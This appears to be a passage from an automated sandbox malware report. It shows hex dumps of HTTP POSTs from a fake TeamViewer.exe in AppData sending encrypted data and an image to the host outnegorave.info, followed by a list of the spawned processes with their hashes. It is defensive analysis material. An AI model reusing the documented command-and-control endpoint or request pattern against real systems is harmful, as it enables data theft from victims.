                                                                                                                      2021-09-15 12:09:06 UTC151OUTData Raw: 51 88 92 64 9f 60 75 03 0b bd 76 9c 90 30 38 61 c0 fc 6b 3e 8a 8f 66 8a e7 65 8b eb c6 bc 9e 19 84 7e 53 43 04 51 0f 9b 39 d8 a1 73 d3 be 33 5a 8f e2 69 5b 53 bb bc 5b 35 51 71 6c 61 58 fc c3 88 db ae f1 c7 5d c5 8e 3d eb 0e 8a 1c 13 dc 14 da 2c 43 78 d1 69 17 3a 78 42 56 e2 48 e4 dd bb 85 d9 bb b7 7c ee fd 2a fd 8e b5 06 9d 1a 2d 9d 84 a0 99 e1 9a 61 25 c6 e5 63 19 cf c8 36 8d b9 3d c9 6c 0e 2b 22 8a 7c 88 39 99 72 f7 51 37 f0 c7 f6 88 73 73 19 2a b3 87 e4 c7 d9 58 63 92 3b 1c f4 e3 d3 15 29 29 69 c6 2a 2a c8 52 93 7a b0 ad 1d 3b 50 b5 b4 b3 bb b7 9e d2 e2 46 b9 01 1a 58 6e 16 32 10 72 57 94 6e 09 c6 7e 83 df 39 d4 53 6a ea c2 4e ce e6 8a df 58 9b 7f b2 4d 61 70 f6 b1 c8 64 83 6d c8 59 63 24 00 c0 b6 c2 18 1c 03 f7 47 d6 ac 5e 6a f6 32 c9 b2 3b 49 a5 b4
                                                                                                                      Data Ascii: Qd`uv08ak>fe~SCQ9s3Zi[S[5QqlaX]=,Cxi:xBVH|*-a%c6=l+"|9rQ7ss*Xc;))i**Rz;PFXn2rWn~9SjNXMapdmYc$G^j2;I
                                                                                                                      2021-09-15 12:09:06 UTC167OUTData Raw: 75 a9 69 fb 61 96 20 c3 7c ca ca b2 aa ee 00 ee 65 07 b6 4e ec 0e b4 fd 12 de 6b 67 d3 2c 2f e0 9b ed 7f e9 8c b6 df 76 55 8c c2 78 c1 04 ae 58 1c 64 7b e3 9a e3 f6 8f 4a 4d a2 93 83 b5 86 a5 fd 7e 07 60 d1 49 1f 97 67 6e b2 5a 5f 3e 9a d1 5a db 4e c3 ce 89 8c b9 2a 5b 8f 99 94 b6 38 1c 1c 01 ce 4e 66 97 63 7d 0d d3 e8 f7 d0 4b 03 6a 10 34 71 47 38 28 43 e4 32 1c 1e 46 59 40 cd 61 6d 14 6d 14 28 0b 98 eb ed ae ad 45 f5 c1 95 d7 ec 76 da 8d a4 28 cd f7 42 a2 4a a0 9f 6c 8c 9f c6 a9 45 63 aa 59 5a ea f7 5a c4 37 0b 04 d1 15 69 26 ce 26 94 b0 28 54 ff 00 19 c8 27 23 3c 67 d6 b9 dd a3 d2 a5 b7 b8 b8 b5 2e 6d 6e 26 84 c8 a5 1f cb 72 bb 94 f5 07 1d 47 b5 0a 2d 6a 3e 65 73 a3 d7 63 96 0b 7f 10 49 32 34 69 75 a9 af 90 58 60 49 b4 cb bb 6f ae 32 33 f5 ac 8f 0f 7f
                                                                                                                      Data Ascii: uia |eNkg,/vUxXd{JM~`IgnZ_>ZN*[8Nfc}Kj4qG8(C2FY@amm(Ev(BJlEcYZZ7i&&(T'#<g.mn&rG-j>escI24iuX`Io23
                                                                                                                      2021-09-15 12:09:06 UTC175OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 34 31 36 31 39 33 37 38 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2341619378--
                                                                                                                      2021-09-15 12:09:08 UTC175INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:09:08 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=1ff005bf053274c8a139f292716a4c6a768fa2a22f3e2fadac5c81cd183e83b3; expires=Thu, 15-Sep-2022 12:09:06 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x887YJH4ElMCRx5jXS5zp7w2i9CCz2a7gNC3SmSP0jfXvX1CBsLZHCBBCZCuGLC7llR1s1BULe1hls%2BFVNabz8eMo77mRp3szhth%2BuRkzXPnYaiqdhll3KvKSXGGvgzu6mP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1be891a6a4e86-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:09:08 UTC176INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.649839172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:10:08 UTC176OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 86397
                                                                                                                      Content-Type: multipart/form-data; boundary=--------1750076427
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:10:08 UTC176OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 30 30 37 36 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------1750076427Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:10:08 UTC176OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 f0 0e 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:10:08 UTC177OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:10:08 UTC193OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 40 ab 5a 7d b2 5c ce c9 21 60 02 e7 e5 fa 8a 23 17 27 64 12 92 8a bb 2a 8a 5a d9 fe c8 b7 fe fc bf 98 ff 00 0a 3f b2 6d ff 00 bf 2f e6 3f c2 b6 fa ad 43 0f ad 53 31 a8 ad af ec 9b 7f ef cb f9 8f f0 a3 fb 26 df fb f2 fe 63 fc 29 fd 5a a0 7d 6a 99 8b 46 2b 67 fb 26 df fb f2 fe 63 fc 2a b5 fd 8c 56 d0 2b c6 ce 49 6c 7c c4 7a 1a 99 61 e7 15 76 54 71 10 93 b2 33 b1 46 29 68 35 81 b8 da 29 68 a0 04 a2 96 8c 52 b0 09 45 2e 29 31 45 86 14 51 8a 28 b0 05 14 51 40 05 2d 25 68 e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4
                                                                                                                      Data Ascii: EPQQEGK@Z}\!`#'d*Z?m/?CS1&c)Z}jF+g&c*V+Il|zavTq3F)h5)hRE.)1EQ(Q@-%hBo:#mbpz\D<C@O*hq{P1C_ZIc[zR
                                                                                                                      2021-09-15 12:10:08 UTC208OUTData Raw: da 0a 28 a2 80 0a 28 a5 44 79 1c 24 6a cc c7 a0 51 92 69 80 94 53 a4 8e 48 9f 64 a8 c8 c3 b3 0c 1a 6d 00 14 51 45 20 0a 28 a2 80 0a 28 a2 98 05 14 51 40 05 14 51 40 05 2d 25 28 a0 02 8a 28 a0 41 4b 49 4b 4c 02 96 92 94 50 02 d2 8a 05 2d 52 44 b6 2e 28 c5 2d 14 ec 48 d3 4d a7 1a 43 49 94 84 a2 8a 29 00 51 45 14 00 b4 b4 94 53 01 68 a2 92 81 0b de 96 92 96 80 0a 28 a2 98 0b 45 25 14 00 51 45 14 c0 51 4b 49 4b 40 82 8a 28 a0 05 a2 8a 29 88 29 68 a2 98 85 a5 14 94 b4 c4 2d 14 94 50 03 85 2d 34 52 d3 24 5a 5a 4a 5a 60 28 a5 cd 36 96 9a 13 1d 4b 4d 14 a2 a9 12 c7 52 d3 69 69 88 75 14 94 53 10 e0 69 c0 d3 29 45 3b 89 a1 d4 b4 da 75 34 48 a2 96 93 34 53 10 ea 75 33 34 a0 d3 42 68 75 19 a4 cd 14 c4 38 1a 76 69 94 b5 49 89 a1 f9 a2 9b 4b 9a 77 26 c3 c1 a5 cd 32 96
                                                                                                                      Data Ascii: ((Dy$jQiSHdmQE ((Q@Q@-%((AKIKLP-RD.(-HMCI)QESh(E%QEQKIK@())h-P-4R$ZZJZ`(6KMRiiuSi)E;u4H4Su34Bhu8viIKw&2
                                                                                                                      2021-09-15 12:10:08 UTC224OUTData Raw: 7f c7 ca 7f b9 59 46 b3 c3 fc 08 8c 57 f1 18 99 a5 a4 a3 e9 5b 9c c2 e6 8a 4a 5e 68 04 28 34 e1 4d c5 38 54 96 85 a7 0a 65 3c 52 65 21 68 a2 8a 45 21 c2 9c 29 a3 8a 70 15 2c b4 38 53 85 20 14 ec 54 b3 44 2d 2d 26 29 40 a4 ca 43 85 38 53 40 a7 0a 86 52 1c 29 d9 a6 0a 78 a4 cb 42 8a 75 34 53 aa 59 48 70 ae 1b c6 80 0b 8b 6c 7f 75 bf 9d 77 03 bd 70 de 34 ff 00 8f 9b 7f f7 1b f9 d5 52 dc 53 38 4a 4d a0 d3 b1 45 63 63 ae e3 76 2d 1b 17 d2 9d 45 16 41 76 2c 45 a1 95 25 85 de 39 10 ee 57 43 82 a7 d4 11 4b 23 3c d2 bc b3 c8 f2 c8 e7 2c ee c4 96 3e a4 9e b4 94 51 64 17 63 44 6a 3b 52 84 5f 4a 5a 5a 76 42 bb 0a 5a 4a 5a 62 1a 51 5b 92 28 31 a9 18 c5 3a 8a 2c 82 ec 67 94 be 94 bb 17 d2 9f 49 47 2a 0b b1 be 5a e7 38 a0 22 8e 82 9d 45 16 41 76 20 50 06 07 4a 40 8a 0e
                                                                                                                      Data Ascii: YFW[J^h(4M8Te<Re!hE!)p,8S TD--&)@C8S@R)xBu4SYHpluwp4RS8JMEccv-EAv,E%9WCK#<,>QdcDj;R_JZZvBZJZbQ[(1:,gIG*Z8"EAv PJ@
                                                                                                                      2021-09-15 12:10:08 UTC240OUTData Raw: 32 e5 ee a2 6f e1 8f ed 10 e6 e6 32 55 67 0f c9 8f b2 b0 c7 24 76 39 e9 c7 a6 2a 52 52 d3 8c 54 55 90 a5 26 f5 61 5a 3a 76 a1 6b 69 67 77 6f 3d a5 c4 8d 72 02 34 b0 dc 2c 64 20 e4 af 28 dc 13 8c fd 07 be 73 a8 a6 d5 d5 84 9d 9d cd 15 be b1 36 ff 00 64 9a c2 e1 ed 63 90 c9 06 db 90 b2 c6 48 01 81 6d 84 30 38 07 ee 8f ad 58 bc d5 ec 65 93 64 76 93 4b 68 cf 03 fd 9d c8 41 18 8d 5c 08 c1 f9 b7 03 bb 25 8e 09 e7 81 9e 31 e8 a9 70 4c a5 36 8d 55 d7 e6 79 63 b8 bc b7 f3 ee 63 13 20 90 3e df 92 45 61 b7 18 e8 a5 89 1f 88 f4 c2 47 af 4e bf 63 0f 6e ad f6 68 64 8d 88 6c 19 59 a3 31 86 3c 76 5d a3 f0 f7 ac ba 28 f6 51 0f 69 22 eb ea 72 b6 89 6f a6 88 82 98 64 dd e7 03 cb 28 24 aa e3 d8 b3 1f c7 da af 43 ab e9 cd 7b 2d e4 f6 37 10 5d cc ad 99 e1 90 3a 46 ec 39 75 88
                                                                                                                      Data Ascii: 2o2Ug$v9*RRTU&aZ:vkigwo=r4,d (s6dcHm08XedvKhA\%1pL6Uycc >EaGNcnhdlY1<v](Qi"rod($C{-7]:F9u
                                                                                                                      2021-09-15 12:10:08 UTC256OUTData Raw: 17 91 c5 a8 4b 6e b6 8c 22 5c 46 84 bb 6c 0c 59 b2 0f 1c 8e 06 3a 1f c2 cc 17 57 57 7a 0a 5d db a2 7d aa 5b 7d e8 a7 ee ef 2b 91 f8 66 8e 97 0e a5 fa 2b 9c 6d 4a e6 3b 78 e0 86 6b c9 ee a5 b8 11 3a c9 14 4b 2c 3f 29 63 8f ba 87 20 70 79 1c f7 e9 53 0b ab e8 ac de 3b b6 bc 8a 49 26 09 6e 42 44 d3 48 31 92 30 b9 41 d0 f2 70 31 f9 d0 06 ed 15 ce c5 7d a8 4b 6e b0 99 a4 8a 51 7f f6 72 f2 24 65 f6 14 dd c8 5c ae 79 ed c7 03 de ad c0 6f 2f 2f 2e 63 5b f9 62 4b 37 58 86 11 09 94 ed 0c 59 b2 bd f3 8f 97 1d ff 00 03 fa fe be f0 35 52 44 90 13 1b ab 05 25 4e d3 9c 11 d4 7d 69 d5 cd 47 25 d5 a4 73 5d a5 d1 11 0d 48 c6 60 08 bb 59 5a 4d a7 24 8c e7 9c 8c 10 38 e9 5d 2d 0b 6b 87 50 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                                                                                      Data Ascii: Kn"\FlY:WWz]}[}+f+mJ;xk:K,?)c pyS;I&nBDH10Ap1}KnQr$e\yo//.c[bK7XY5RD%N}iG%s]H`YZM$8]-kP(((((((
                                                                                                                      2021-09-15 12:10:08 UTC261OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 30 30 37 36 34 32 37 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------1750076427--
                                                                                                                      2021-09-15 12:10:18 UTC261INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:10:18 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=f4b2fe0e693337d31e5a414d614f56856b1c8f2532f060351f24f1a8e78bef0f; expires=Thu, 15-Sep-2022 12:10:08 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HEO3VrQh%2FvsTQW6Ij0CiQ7HlUyvWT4dITU60tYAYAZNimIVLNAITa%2F0OfXSbs2EwB%2FgZldrqHYIcjCi1UnLEk%2Ff8e75Y8OV5XkBDyWgkrRa1n%2FGmG9sOa5gg7ewy%2FQkW21zQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1c00cbaeed729-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:10:18 UTC262INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      Analysis Process: svchost.exe PID: 6400 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:07:31
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: 77Etc0bR2v.exe PID: 6880 Parent PID: 1316

                                                                                                                      General

                                                                                                                      Start time:14:07:32
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\Desktop\77Etc0bR2v.exe'
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1828192 bytes
                                                                                                                      MD5 hash:E71E3B995477081569ED357E4D403666
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6952 Parent PID: 6880

                                                                                                                      General

                                                                                                                      Start time:14:07:35
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: TeamViewer.exe PID: 5424 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:07:47
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: svchost.exe PID: 5512 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:07:55
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 5568 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:00
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
                                                                                                                      Imagebase:0x890000
                                                                                                                      File size:44520 bytes
                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: svchost.exe PID: 3216 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:09
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Analysis Process: TeamViewer.exe PID: 1972 Parent PID: 3440

                                                                                                                      General

                                                                                                                      Start time:14:08:11
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: TeamViewer.exe PID: 5724 Parent PID: 3440

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6052 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:08:20
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: svchost.exe PID: 4928 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: TeamViewer.exe PID: 6704 Parent PID: 4920

                                                                                                                      General

                                                                                                                      Start time:14:08:27
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: svchost.exe PID: 5860 Parent PID: 560

                                                                                                                      General

                                                                                                                      Start time:14:08:49
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >